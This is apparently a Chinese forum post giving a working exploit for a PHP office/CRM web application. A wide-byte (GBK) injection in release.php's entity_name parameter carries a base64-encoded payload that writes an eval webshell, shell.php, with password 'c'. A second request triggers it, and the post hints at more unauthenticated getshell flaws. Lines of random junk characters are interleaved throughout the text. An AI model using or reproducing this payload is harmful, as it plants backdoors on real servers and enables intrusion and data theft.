此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.
' q7 y& |% J% U6 G( D4 [/ E, B5 i9 X0 o' h- ^8 g, O" ]
9 c! I9 T8 e+ x$ N6 f/ ]4 QEXP:+ j- h- y7 w2 x" b3 z! }7 O
. [, a& t! y. S* ~9 |8 L& ?
第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
z2 ^4 q4 A- r' M* V. B; R , J* _; }' X! C3 d) S
第二步: [GET]http://site/general/email/index.php
9 \" ^8 J: S' M3 S " Y/ f2 f, c3 |2 Q& V2 Z2 n0 o
SHELL: http://site/general/email/shell.php 密码C
& p7 L0 s( q1 I* ?3 y
) j/ z7 Z2 ]" s% `! ` 6 W! w! S8 `- \! [2 h
此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好9 q& [4 `& n9 k) Z! H% L+ U
1 j2 o0 O$ L3 ]% J: d5 l
有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
) E2 X& o a6 o* T& b$ w
$ \ W6 p4 E9 }) X1 Q( E; [2 T4 n5 p k
|